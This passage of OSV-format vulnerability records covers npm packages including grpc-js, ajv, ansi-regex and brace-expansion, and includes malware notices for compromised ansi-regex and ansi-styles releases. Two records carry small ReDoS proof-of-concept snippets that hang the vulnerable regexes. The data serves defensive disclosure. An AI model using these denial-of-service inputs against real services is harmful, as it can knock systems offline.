has been patched in versions 1.10.9, 1.9.15, and 1.8.22\n", "affected": [ { "package": { "name": "@grpc/grpc-js", "ecosystem": "npm", "purl": "pkg:npm/%40grpc/grpc-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.10.0" }, { "fixed": "1.10.9" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-7v5v-9h63-cj86/GHSA-7v5v-9h63-cj86.json" } }, { "package": { "name": "@grpc/grpc-js", "ecosystem": "npm", "purl": "pkg:npm/%40grpc/grpc-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.9.0" }, { "fixed": "1.9.15" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-7v5v-9h63-cj86/GHSA-7v5v-9h63-cj86.json" } }, { "package": { "name": "@grpc/grpc-js", "ecosystem": "npm", "purl": "pkg:npm/%40grpc/grpc-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.8.22" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-7v5v-9h63-cj86/GHSA-7v5v-9h63-cj86.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/grpc/grpc-node/security/advisories/GHSA-7v5v-9h63-cj86" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37168" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/commit/08b0422dae56467ecae1007e899efe66a8c4a650" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/commit/674f4e351a619fd4532f84ae6dff96b8ee4e1ed3" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/commit/a8a020339c7eab1347a343a512ad17a4aea4bfdb" }, { "type": "PACKAGE", "url": "https://github.com/grpc/grpc-node" } ], "database_specific": { "cwe_ids": [ "CWE-789" ], "github_reviewed": true, "github_reviewed_at": "2024-06-10T21:38:05Z", "nvd_published_at": "2024-06-10T22:15:12Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pp75-xfpw-37g9", "published": "2021-05-10T19:16:14Z", "modified": "2025-01-14T08:57:34.513174Z", "aliases": [ "CVE-2020-7768" ], "summary": "Prototype pollution in grpc and @grpc/grpc-js", "details": "\"The package grpc before 1.24.4 and the package @grpc/grpc-js before 1.1.8 are vulnerable to Prototype Pollution via loadPackageDefinition.\"", "affected": [ { "package": { "name": "grpc", "ecosystem": "npm", "purl": "pkg:npm/grpc" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.24.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-pp75-xfpw-37g9/GHSA-pp75-xfpw-37g9.json" } }, { "package": { "name": "@grpc/grpc-js", "ecosystem": "npm", "purl": "pkg:npm/%40grpc/grpc-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.8" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-pp75-xfpw-37g9/GHSA-pp75-xfpw-37g9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7768" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/pull/1605" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/pull/1606" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/releases/tag/grpc%401.24.4" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038819" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-GRPC-598671" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-GRPCGRPCJS-1038818" }, { "type": "WEB", "url": "https://www.npmjs.com/package/@grpc/grpc-js" }, { "type": "WEB", "url": "https://www.npmjs.com/package/grpc" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2021-04-19T22:57:05Z", "nvd_published_at": "2020-11-11T11:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6chw-6frg-f759", "published": "2020-04-03T21:48:38Z", "modified": "2021-08-23T15:10:32Z", "summary": "Regular Expression Denial of Service in Acorn", "details": "Affected versions of acorn are vulnerable to Regular Expression Denial of Service.\nA regex in the form of /[x-\\ud800]/u causes the parser to enter an infinite loop.\nThe string is not valid UTF16 which usually results in it being sanitized before reaching the parser.\nIf an application processes untrusted input and passes it directly to acorn,\nattackers may leverage the vulnerability leading to Denial of Service.", "affected": [ { "package": { "name": "acorn", "ecosystem": "npm", "purl": "pkg:npm/acorn" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "5.5.0" }, { "fixed": "5.7.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-6chw-6frg-f759/GHSA-6chw-6frg-f759.json" } }, { "package": { "name": "acorn", "ecosystem": "npm", "purl": "pkg:npm/acorn" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.4.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-6chw-6frg-f759/GHSA-6chw-6frg-f759.json" } }, { "package": { "name": "acorn", "ecosystem": "npm", "purl": "pkg:npm/acorn" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-6chw-6frg-f759/GHSA-6chw-6frg-f759.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/acornjs/acorn/issues/929" }, { "type": "WEB", "url": "https://github.com/acornjs/acorn/commit/793c0e569ed1158672e3a40aeed1d8518832b802" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-ACORN-559469" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1488" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-04-03T21:42:14Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v88g-cgmw-v5xw", "published": "2022-02-10T23:30:59Z", "modified": "2024-06-21T21:33:48Z", "aliases": [ "CVE-2020-15366" ], "summary": "Prototype Pollution in Ajv", "details": "An issue was discovered in ajv.validate() in Ajv (aka Another JSON Schema Validator) 6.12.2. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. (While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)", "affected": [ { "package": { "name": "ajv", "ecosystem": "npm", "purl": "pkg:npm/ajv" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "6.12.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-v88g-cgmw-v5xw/GHSA-v88g-cgmw-v5xw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15366" }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/commit/65b2f7d76b190ac63a0d4e9154c712d7aa37049f" }, { "type": "PACKAGE", "url": "https://github.com/ajv-validator/ajv" }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/releases/tag/v6.12.3" }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/tags" }, { "type": "WEB", "url": "https://hackerone.com/bugs?subject=user\u0026report_id=894259" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0007" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2021-05-10T21:23:41Z", "nvd_published_at": "2020-07-15T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-93q8-gq69-wqmw", "published": "2021-09-20T20:20:09Z", "modified": "2023-11-08T04:06:25.310142Z", "aliases": [ "CVE-2021-3807" ], "related": [ "CGA-pgv4-jr4j-qh5w" ], "summary": "Inefficient Regular Expression Complexity in chalk/ansi-regex", "details": "ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.\n\n**Proof of Concept**\n```js\nimport ansiRegex from 'ansi-regex';\nfor(var i = 1; i \u003c= 50000; i++) {\n var time = Date.now();\n var attack_str = \"\\u001B[\"+\";\".repeat(i*10000);\n ansiRegex().test(attack_str)\n var time_cost = Date.now() - time;\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\n}\n```\nThe ReDOS is mainly due to the sub-patterns `[[\\\\]()#;?]*` and `(?:;[-a-zA-Z\\\\d\\\\/#\u0026.:=?%@~_]*)*`", "affected": [ { "package": { "name": "ansi-regex", "ecosystem": "npm", "purl": "pkg:npm/ansi-regex" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-93q8-gq69-wqmw/GHSA-93q8-gq69-wqmw.json" } }, { "package": { "name": "ansi-regex", "ecosystem": "npm", "purl": "pkg:npm/ansi-regex" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "5.0.0" }, { "fixed": "5.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-93q8-gq69-wqmw/GHSA-93q8-gq69-wqmw.json" } }, { "package": { "name": "ansi-regex", "ecosystem": "npm", "purl": "pkg:npm/ansi-regex" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-93q8-gq69-wqmw/GHSA-93q8-gq69-wqmw.json" } }, { "package": { "name": "ansi-regex", "ecosystem": "npm", "purl": "pkg:npm/ansi-regex" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-93q8-gq69-wqmw/GHSA-93q8-gq69-wqmw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3807" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/issues/38#issuecomment-924086311" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/issues/38#issuecomment-925924774" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/commit/75a657da7af875b2e2724fd6331bf0a4b23d3c9a" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f9" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/commit/c3c0b3f2736b9c01feec0fef33980c43720dcde8" }, { "type": "WEB", "url": "https://app.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908" }, { "type": "PACKAGE", "url": "https://github.com/chalk/ansi-regex" }, { "type": "WEB", "url": "https://github.com/chalk/ansi-regex/releases/tag/v6.0.1" }, { "type": "WEB", "url": "https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221014-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-697" ], "github_reviewed": true, "github_reviewed_at": "2021-09-20T18:56:22Z", "nvd_published_at": "2021-09-17T07:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46966", "published": "2025-09-08T17:18:30Z", "modified": "2025-09-12T01:13:34Z", "aliases": [ "GHSA-jvhh-2m83-6w29" ], "summary": "Malicious code in ansi-regex (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (2777701ac1bf8726f2ea353b404c7d765ea3eb7bf0506207db828590ade1bf6e)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "ansi-regex", "ecosystem": "npm", "purl": "pkg:npm/ansi-regex" }, "versions": [ "6.2.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ansi-regex/MAL-2025-46966.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-jvhh-2m83-6w29" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-jvhh-2m83-6w29", "import_time": "2025-09-09T00:35:48.413747424Z", "modified_time": "2025-09-08T18:22:01Z", "sha256": "2777701ac1bf8726f2ea353b404c7d765ea3eb7bf0506207db828590ade1bf6e", "source": "ghsa-malware", "versions": [ "6.2.1" ] }, { "id": "GHSA-jvhh-2m83-6w29", "import_time": "2025-09-10T00:34:05.227213566Z", "modified_time": "2025-09-08T18:22:01Z", "sha256": "fd7ef224c32477d1ab8ba30a6d1a52e86d5c304753cdc3ae4bb69328e529bf8c", "source": "ghsa-malware", "versions": [ "6.2.1" ] }, { "id": "GHSA-jvhh-2m83-6w29", "import_time": "2025-09-11T00:34:35.47387599Z", "modified_time": "2025-09-10T17:56:02Z", "sha256": "0b61367c5dd8ed0ce2f849066960f18ee8861dc062dd4b8ee645a8a25fb7b8a7", "source": "ghsa-malware", "versions": [ "6.2.1" ] }, { "id": "GHSA-jvhh-2m83-6w29", "import_time": "2025-09-12T00:33:58.084580721Z", "modified_time": "2025-09-10T17:56:02Z", "sha256": "30d6b7a25ab660d87db43cd6b59c0a62eb3bdd66f3bba12a3374676105921d2d", "source": "ghsa-malware", "versions": [ "6.2.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46967", "published": "2025-09-08T17:07:44Z", "modified": "2025-09-12T01:13:34Z", "aliases": [ "GHSA-p5rr-crjh-x7gr" ], "summary": "Malicious code in ansi-styles (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (f82dc187071d265457effc48cb50c7ac209143e5da1a502a633a1c35b88aac67)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "ansi-styles", "ecosystem": "npm", "purl": "pkg:npm/ansi-styles" }, "versions": [ "6.2.2" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ansi-styles/MAL-2025-46967.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-p5rr-crjh-x7gr" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-p5rr-crjh-x7gr", "import_time": "2025-09-09T00:35:48.416514611Z", "modified_time": "2025-09-08T18:23:38Z", "sha256": "f82dc187071d265457effc48cb50c7ac209143e5da1a502a633a1c35b88aac67", "source": "ghsa-malware", "versions": [ "6.2.2" ] }, { "id": "GHSA-p5rr-crjh-x7gr", "import_time": "2025-09-10T00:34:05.231930273Z", "modified_time": "2025-09-08T18:23:38Z", "sha256": "3fa94453bd8bd98849aa59804994125d406c772d6f2e5653e8fe1325bed56aa8", "source": "ghsa-malware", "versions": [ "6.2.2" ] }, { "id": "GHSA-p5rr-crjh-x7gr", "import_time": "2025-09-11T00:34:35.480419354Z", "modified_time": "2025-09-10T17:52:23Z", "sha256": "c19c5617faf7e2a6e818e2f53e125cf5ce6f045a959ac86cd9343d267503c16a", "source": "ghsa-malware", "versions": [ "6.2.2" ] }, { "id": "GHSA-p5rr-crjh-x7gr", "import_time": "2025-09-12T00:33:58.092782064Z", "modified_time": "2025-09-10T17:52:23Z", "sha256": "a11059eb0365e0623522503424e1528b796670bf5013d28f4450b8082e5f1d8c", "source": "ghsa-malware", "versions": [ "6.2.2" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-832h-xg76-4gv6", "published": "2018-01-29T15:50:46Z", "modified": "2023-11-08T03:59:15.193726Z", "aliases": [ "CVE-2017-18077" ], "summary": "ReDoS in brace-expansion", "details": "Affected versions of `brace-expansion` are vulnerable to a regular expression denial of service condition.\n\n## Proof of Concept\n\n```\nvar expand = require('brace-expansion');\nexpand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\\n}');\n```\n\n\n## Recommendation\n\nUpdate to version 1.1.7 or later.", "affected": [ { "package": { "name": "brace-expansion", "ecosystem": "npm", "purl": "pkg:npm/brace-expansion" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-832h-xg76-4gv6/GHSA-832h-xg76-4gv6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-18077" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/issues/33" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/pull/35" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/pull/35/commits/b13381281cead487cbdbfd6a69fb097ea5e456c3" }, { "type": "WEB", "url": "https://bugs.debian.org/862712" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-832h-xg76-4gv6" }, { "type": "PACKAGE", "url": "https://github.com/juliangruber/brace-expansion" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/338" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:24:01Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v6h2-p8h4-qcjw", "published": "2025-06-09T21:30:51Z", "modified": "2025-06-11T20:54:10Z", "aliases": [ "CVE-2025-5889" ], "related": [ "CGA-48f6-2xrx-cxvw", "CGA-53f7-rx58-5rx6", "CGA-5489-g42r-jj95", "CGA-6q97-x38p-2v36", "CGA-8v3m-9726-pcqj", "CGA-9w98-92pm-h3wg", "CGA-gwp3-55v6-p25f", "CGA-hvx5-j33w-wf72", "CGA-jq8h-hpf9-qxxv", "CGA-jv3c-567r-7fr7", "CGA-mvmv-c4pf-vgpr", "CGA-p2f9-h939-jv5f", "CGA-vr9h-m8qm-5mj9", "CGA-x49c-f2g9-2gqg", "CGA-x9mj-gpvv-mx29", "CGA-xc8g-m7h6-2rp6", "CGA-xqvv-5w52-gqqq" ], "summary": "brace-expansion Regular Expression Denial of Service vulnerability", "details": "A vulnerability was found in juliangruber brace-expansion up to 1.1.11/2.0.1/3.0.0/4.0.0. It has been rated as problematic. Affected by this issue is the function expand of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.1.12, 2.0.2, 3.0.1 and 4.0.1 is able to address this issue. The name of the patch is `a5b98a4f30d7813266b221435e1eaaf25a1b0ac5`. It is recommended to upgrade the affected component.", "affected": [ { "package": { "name": "brace-expansion", "ecosystem": "npm", "purl": "pkg:npm/brace-expansion" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.2" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.0.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-v6h2-p8h4-qcjw/GHSA-v6h2-p8h4-qcjw.json" } }, { "package": { "name": "brace-expansion", "ecosystem": "npm", "purl": "pkg:npm/brace-expansion" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.12" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.1.11", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-v6h2-p8h4-qcjw/GHSA-v6h2-p8h4-qcjw.json" } }, { "package": { "name": "brace-expansion", "ecosystem": "npm", "purl": "pkg:npm/brace-expansion" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.1" } ] } ], "versions": [ "3.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-v6h2-p8h4-qcjw/GHSA-v6h2-p8h4-qcjw.json" } }, { "package": { "name": "brace-expansion", "ecosystem": "npm", "purl": "pkg:npm/brace-expansion" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.0.1" } ] } ], "versions": [ "4.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-v6h2-p8h4-qcjw/GHSA-v6h2-p8h4-qcjw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5889" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/pull/65/commits/a5b98a4f30d7813266b221435e1eaaf25a1b0ac5" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/commit/0b6a9781e18e9d2769bb2931f4856d1360243ed2" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/commit/15f9b3c75ebf5988198241fecaebdc45eff28a9f" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/commit/36603d5f3599a37af9e85eda30acd7d28599c36e" }, { "type": "WEB", "url": "https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217" }, { "type": "WEB", "url": "https://gist.github.com/mmmsssttt404/37a40ce7d6e5ca604858fe30814d9466" }, { "type": "PACKAGE", "url": "https://github.com/juliangruber/brace-expansion" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.311660" }, { "type": "WEB", "url": "https://vuldb.com/?id.311660" }, { "type": "WEB", "url": "https://vuldb.com/?submit.585717" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2025-06-10T22:51:59Z", "nvd_published_at": "2025-06-09T19:15:25Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cwfw-4gq5-mrqx", "published": "2022-01-06T20:42:03Z", "modified": "2023-11-08T03:59:45.345388Z", "aliases": [ "CVE-2018-1109" ], "summary": "Regular Expression Denial of Service (ReDoS) in braces", "details": "A vulnerability was found in Braces versions prior to 2.3.1. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.", "affected": [ { "package": { "name": "braces", "ecosystem": "npm", "purl": "pkg:npm/braces" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.3.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-cwfw-4gq5-mrqx/GHSA-cwfw-4gq5-mrqx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1109" }, { "type": "WEB", "url": "https://github.com/micromatch/braces/commit/abdafb0cae1e0c00f184abbadc692f4eaa98f451" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1547272" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:braces:20180219" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-03-31T21:35:00Z", "nvd_published_at": "2021-03-30T02:15:00Z", "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-g95f-p29q-9xw4", "published": "2019-06-06T15:30:30Z", "modified": "2021-08-04T21:35:07Z", "summary": "Regular Expression Denial of Service in braces", "details": "Versions of `braces` prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service.\n\n\n## Recommendation\n\nUpgrade to version 2.3.1 or higher.", "affected": [ { "package": { "name": "braces", "ecosystem": "npm", "purl": "pkg:npm/braces" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.3.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-g95f-p29q-9xw4/GHSA-g95f-p29q-9xw4.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/micromatch/braces/commit/abdafb0cae1e0c00f184abbadc692f4eaa98f451" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:braces:20180219" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/786" } ], "database_specific": { "cwe_ids": [ "CWE-185", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-06T09:40:51Z", "nvd_published_at": null, "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-grv7-fg5c-xmjg", "published": "2024-05-14T18:30:54Z", "modified": "2024-07-15T22:12:28.795792Z", "aliases": [ "CVE-2024-4068" ], "related": [ "CGA-g3x5-7mr7-wr8m", "CGA-hq78-8245-675v", "CGA-jrqh-c82g-rxvm", "CGA-p4gw-wx75-2mg4", "CGA-w95g-rrw2-66h4", "CGA-wr9w-hw24-rqg5" ], "summary": "Uncontrolled resource consumption in braces", "details": "The NPM package `braces` fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends \"imbalanced braces\" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.\n", "affected": [ { "package": { "name": "braces", "ecosystem": "npm", "purl": "pkg:npm/braces" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-grv7-fg5c-xmjg/GHSA-grv7-fg5c-xmjg.json" } } 